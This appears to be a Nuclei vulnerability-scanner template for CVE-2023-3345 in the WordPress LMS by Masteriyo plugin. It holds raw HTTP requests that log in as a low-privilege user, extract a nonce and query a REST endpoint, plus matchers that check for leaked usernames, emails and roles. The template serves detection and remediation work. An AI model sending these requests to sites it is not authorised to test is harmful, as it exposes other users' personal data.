id: CVE-2023-3345 info: name: LMS by Masteriyo < 1.6.8 - Information Exposure author: DhiyaneshDK severity: medium description: | The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints. remediation: | Upgrade LMS by Masteriyo to version 1.6.8 or higher to fix the vulnerability. reference: - https://wpscan.com/vulnerability/0d07423e-98d2-43a3-824d-562747a3d65a - https://github.com/RandomRobbieBF/learning-management-system - https://wordpress.org/plugins/learning-management-system - https://nvd.nist.gov/vuln/detail/CVE-2023-3345 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2023-3345 cwe-id: CWE-200 epss-score: 0.00235 epss-percentile: 0.61422 cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: masteriyo product: masteriyo framework: wordpress tags: wp-plugin,xss,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/profile.php HTTP/1.1 Host: {{Hostname}} - | GET /wp-json/masteriyo/v1/users/ HTTP/1.1 Host: {{Hostname}} X-WP-Nonce: {{nonce}} matchers-condition: and matchers: - type: word part: body_3 words: - '"username":' - '"email":' - '"roles":' condition: and - type: word part: header_3 words: - application/json - type: status status: - 200 extractors: - type: regex name: nonce part: body group: 1 regex: - '"nonce":"([a-z0-9]+)","versionString' internal: true # digest: 4a0a00473045022100856674dd7e531b7037acc8bd72442c5e70c32c3042647940ed45d094dc655c6d022015192067c7fd1a5f2707fd086eb9425fbb2a529218d911a2b0f6a38d07228952:922c64590222798bb761d5b6d8e72950